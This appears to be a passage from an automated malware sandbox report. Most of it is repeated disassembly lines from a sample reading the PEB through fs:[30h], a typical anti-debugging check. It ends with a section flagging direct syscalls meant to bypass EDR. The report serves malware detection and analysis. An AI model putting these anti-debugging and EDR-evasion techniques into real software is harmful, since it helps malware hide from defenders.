                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov esi, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov eax, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov eax, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov eax, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov ecx, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov eax, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018207C3 mov eax, dword ptr fs:[00000030h]4_2_018207C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC720 mov eax, dword ptr fs:[00000030h]4_2_017DC720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC720 mov eax, dword ptr fs:[00000030h]4_2_017DC720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E7E1 mov eax, dword ptr fs:[00000030h]4_2_0182E7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0710 mov eax, dword ptr fs:[00000030h]4_2_017A0710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0710 mov eax, dword ptr fs:[00000030h]4_2_017D0710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC700 mov eax, dword ptr fs:[00000030h]4_2_017DC700
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A47FB mov eax, dword ptr fs:[00000030h]4_2_017A47FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A47FB mov eax, dword ptr fs:[00000030h]4_2_017A47FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181C730 mov eax, dword ptr fs:[00000030h]4_2_0181C730
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AC7C0 mov eax, dword ptr fs:[00000030h]4_2_017AC7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A07AF mov eax, dword ptr fs:[00000030h]4_2_017A07AF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01824755 mov eax, dword ptr fs:[00000030h]4_2_01824755
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E75D mov eax, dword ptr fs:[00000030h]4_2_0182E75D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D2674 mov eax, dword ptr fs:[00000030h]4_2_017D2674
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA660 mov eax, dword ptr fs:[00000030h]4_2_017DA660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA660 mov eax, dword ptr fs:[00000030h]4_2_017DA660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BC640 mov eax, dword ptr fs:[00000030h]4_2_017BC640
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A262C mov eax, dword ptr fs:[00000030h]4_2_017A262C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE627 mov eax, dword ptr fs:[00000030h]4_2_017BE627
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D6620 mov eax, dword ptr fs:[00000030h]4_2_017D6620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8620 mov eax, dword ptr fs:[00000030h]4_2_017D8620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2619 mov eax, dword ptr fs:[00000030h]4_2_017E2619
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B260B mov eax, dword ptr fs:[00000030h]4_2_017B260B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E6F2 mov eax, dword ptr fs:[00000030h]4_2_0181E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E6F2 mov eax, dword ptr fs:[00000030h]4_2_0181E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E6F2 mov eax, dword ptr fs:[00000030h]4_2_0181E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E6F2 mov eax, dword ptr fs:[00000030h]4_2_0181E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018206F1 mov eax, dword ptr fs:[00000030h]4_2_018206F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018206F1 mov eax, dword ptr fs:[00000030h]4_2_018206F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E609 mov eax, dword ptr fs:[00000030h]4_2_0181E609
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]4_2_017DA6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA6C7 mov eax, dword ptr fs:[00000030h]4_2_017DA6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D66B0 mov eax, dword ptr fs:[00000030h]4_2_017D66B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC6A6 mov eax, dword ptr fs:[00000030h]4_2_017DC6A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186866E mov eax, dword ptr fs:[00000030h]4_2_0186866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186866E mov eax, dword ptr fs:[00000030h]4_2_0186866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4690 mov eax, dword ptr fs:[00000030h]4_2_017A4690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4690 mov eax, dword ptr fs:[00000030h]4_2_017A4690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E096E mov eax, dword ptr fs:[00000030h]4_2_017E096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E096E mov edx, dword ptr fs:[00000030h]4_2_017E096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E096E mov eax, dword ptr fs:[00000030h]4_2_017E096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C6962 mov eax, dword ptr fs:[00000030h]4_2_017C6962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C6962 mov eax, dword ptr fs:[00000030h]4_2_017C6962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C6962 mov eax, dword ptr fs:[00000030h]4_2_017C6962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018289B3 mov esi, dword ptr fs:[00000030h]4_2_018289B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018289B3 mov eax, dword ptr fs:[00000030h]4_2_018289B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018289B3 mov eax, dword ptr fs:[00000030h]4_2_018289B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018369C0 mov eax, dword ptr fs:[00000030h]4_2_018369C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186A9D3 mov eax, dword ptr fs:[00000030h]4_2_0186A9D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798918 mov eax, dword ptr fs:[00000030h]4_2_01798918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798918 mov eax, dword ptr fs:[00000030h]4_2_01798918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E9E0 mov eax, dword ptr fs:[00000030h]4_2_0182E9E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D29F9 mov eax, dword ptr fs:[00000030h]4_2_017D29F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D29F9 mov eax, dword ptr fs:[00000030h]4_2_017D29F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E908 mov eax, dword ptr fs:[00000030h]4_2_0181E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E908 mov eax, dword ptr fs:[00000030h]4_2_0181E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C912 mov eax, dword ptr fs:[00000030h]4_2_0182C912
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182892A mov eax, dword ptr fs:[00000030h]4_2_0182892A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0183892B mov eax, dword ptr fs:[00000030h]4_2_0183892B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA9D0 mov eax, dword ptr fs:[00000030h]4_2_017AA9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D49D0 mov eax, dword ptr fs:[00000030h]4_2_017D49D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820946 mov eax, dword ptr fs:[00000030h]4_2_01820946
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A09AD mov eax, dword ptr fs:[00000030h]4_2_017A09AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A09AD mov eax, dword ptr fs:[00000030h]4_2_017A09AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A0 mov eax, dword ptr fs:[00000030h]4_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01844978 mov eax, dword ptr fs:[00000030h]4_2_01844978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01844978 mov eax, dword ptr fs:[00000030h]4_2_01844978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C97C mov eax, dword ptr fs:[00000030h]4_2_0182C97C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C89D mov eax, dword ptr fs:[00000030h]4_2_0182C89D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4859 mov eax, dword ptr fs:[00000030h]4_2_017A4859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4859 mov eax, dword ptr fs:[00000030h]4_2_017A4859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0854 mov eax, dword ptr fs:[00000030h]4_2_017D0854
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov eax, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov eax, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov eax, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov ecx, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov eax, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2835 mov eax, dword ptr fs:[00000030h]4_2_017C2835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA830 mov eax, dword ptr fs:[00000030h]4_2_017DA830
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186A8E4 mov eax, dword ptr fs:[00000030h]4_2_0186A8E4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC8F9 mov eax, dword ptr fs:[00000030h]4_2_017DC8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC8F9 mov eax, dword ptr fs:[00000030h]4_2_017DC8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C810 mov eax, dword ptr fs:[00000030h]4_2_0182C810
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE8C0 mov eax, dword ptr fs:[00000030h]4_2_017CE8C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184483A mov eax, dword ptr fs:[00000030h]4_2_0184483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184483A mov eax, dword ptr fs:[00000030h]4_2_0184483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E872 mov eax, dword ptr fs:[00000030h]4_2_0182E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E872 mov eax, dword ptr fs:[00000030h]4_2_0182E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836870 mov eax, dword ptr fs:[00000030h]4_2_01836870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836870 mov eax, dword ptr fs:[00000030h]4_2_01836870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0887 mov eax, dword ptr fs:[00000030h]4_2_017A0887
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179CB7E mov eax, dword ptr fs:[00000030h]4_2_0179CB7E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01854BB0 mov eax, dword ptr fs:[00000030h]4_2_01854BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01854BB0 mov eax, dword ptr fs:[00000030h]4_2_01854BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184EBD0 mov eax, dword ptr fs:[00000030h]4_2_0184EBD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CEB20 mov eax, dword ptr fs:[00000030h]4_2_017CEB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CEB20 mov eax, dword ptr fs:[00000030h]4_2_017CEB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182CBF0 mov eax, dword ptr fs:[00000030h]4_2_0182CBF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CEBFC mov eax, dword ptr fs:[00000030h]4_2_017CEBFC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8BF0 mov eax, dword ptr fs:[00000030h]4_2_017A8BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8BF0 mov eax, dword ptr fs:[00000030h]4_2_017A8BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8BF0 mov eax, dword ptr fs:[00000030h]4_2_017A8BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181EB1D mov eax, dword ptr fs:[00000030h]4_2_0181EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01868B28 mov eax, dword ptr fs:[00000030h]4_2_01868B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01868B28 mov eax, dword ptr fs:[00000030h]4_2_01868B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0BCD mov eax, dword ptr fs:[00000030h]4_2_017A0BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0BCD mov eax, dword ptr fs:[00000030h]4_2_017A0BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0BCD mov eax, dword ptr fs:[00000030h]4_2_017A0BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0BCB mov eax, dword ptr fs:[00000030h]4_2_017C0BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0BCB mov eax, dword ptr fs:[00000030h]4_2_017C0BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0BCB mov eax, dword ptr fs:[00000030h]4_2_017C0BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836B40 mov eax, dword ptr fs:[00000030h]4_2_01836B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836B40 mov eax, dword ptr fs:[00000030h]4_2_01836B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0BBE mov eax, dword ptr fs:[00000030h]4_2_017B0BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0BBE mov eax, dword ptr fs:[00000030h]4_2_017B0BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01848B42 mov eax, dword ptr fs:[00000030h]4_2_01848B42
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01854B4B mov eax, dword ptr fs:[00000030h]4_2_01854B4B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01854B4B mov eax, dword ptr fs:[00000030h]4_2_01854B4B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184EB50 mov eax, dword ptr fs:[00000030h]4_2_0184EB50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874A80 mov eax, dword ptr fs:[00000030h]4_2_01874A80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCA6F mov eax, dword ptr fs:[00000030h]4_2_017DCA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCA6F mov eax, dword ptr fs:[00000030h]4_2_017DCA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCA6F mov eax, dword ptr fs:[00000030h]4_2_017DCA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0A5B mov eax, dword ptr fs:[00000030h]4_2_017B0A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0A5B mov eax, dword ptr fs:[00000030h]4_2_017B0A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6A50 mov eax, dword ptr fs:[00000030h]4_2_017A6A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCA38 mov eax, dword ptr fs:[00000030h]4_2_017DCA38
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C4A35 mov eax, dword ptr fs:[00000030h]4_2_017C4A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C4A35 mov eax, dword ptr fs:[00000030h]4_2_017C4A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CEA2E mov eax, dword ptr fs:[00000030h]4_2_017CEA2E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCA24 mov eax, dword ptr fs:[00000030h]4_2_017DCA24
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182CA11 mov eax, dword ptr fs:[00000030h]4_2_0182CA11
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAAEE mov eax, dword ptr fs:[00000030h]4_2_017DAAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAAEE mov eax, dword ptr fs:[00000030h]4_2_017DAAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0AD0 mov eax, dword ptr fs:[00000030h]4_2_017A0AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D4AD0 mov eax, dword ptr fs:[00000030h]4_2_017D4AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D4AD0 mov eax, dword ptr fs:[00000030h]4_2_017D4AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F6ACC mov eax, dword ptr fs:[00000030h]4_2_017F6ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F6ACC mov eax, dword ptr fs:[00000030h]4_2_017F6ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F6ACC mov eax, dword ptr fs:[00000030h]4_2_017F6ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8AA0 mov eax, dword ptr fs:[00000030h]4_2_017A8AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8AA0 mov eax, dword ptr fs:[00000030h]4_2_017A8AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F6AA4 mov eax, dword ptr fs:[00000030h]4_2_017F6AA4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184EA60 mov eax, dword ptr fs:[00000030h]4_2_0184EA60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8A90 mov edx, dword ptr fs:[00000030h]4_2_017D8A90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181CA72 mov eax, dword ptr fs:[00000030h]4_2_0181CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181CA72 mov eax, dword ptr fs:[00000030h]4_2_0181CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA80 mov eax, dword ptr fs:[00000030h]4_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D59 mov eax, dword ptr fs:[00000030h]4_2_017A8D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D59 mov eax, dword ptr fs:[00000030h]4_2_017A8D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D59 mov eax, dword ptr fs:[00000030h]4_2_017A8D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D59 mov eax, dword ptr fs:[00000030h]4_2_017A8D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D59 mov eax, dword ptr fs:[00000030h]4_2_017A8D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0D59 mov eax, dword ptr fs:[00000030h]4_2_017A0D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0D59 mov eax, dword ptr fs:[00000030h]4_2_017A0D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0D59 mov eax, dword ptr fs:[00000030h]4_2_017A0D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01868DAE mov eax, dword ptr fs:[00000030h]4_2_01868DAE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01868DAE mov eax, dword ptr fs:[00000030h]4_2_01868DAE
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
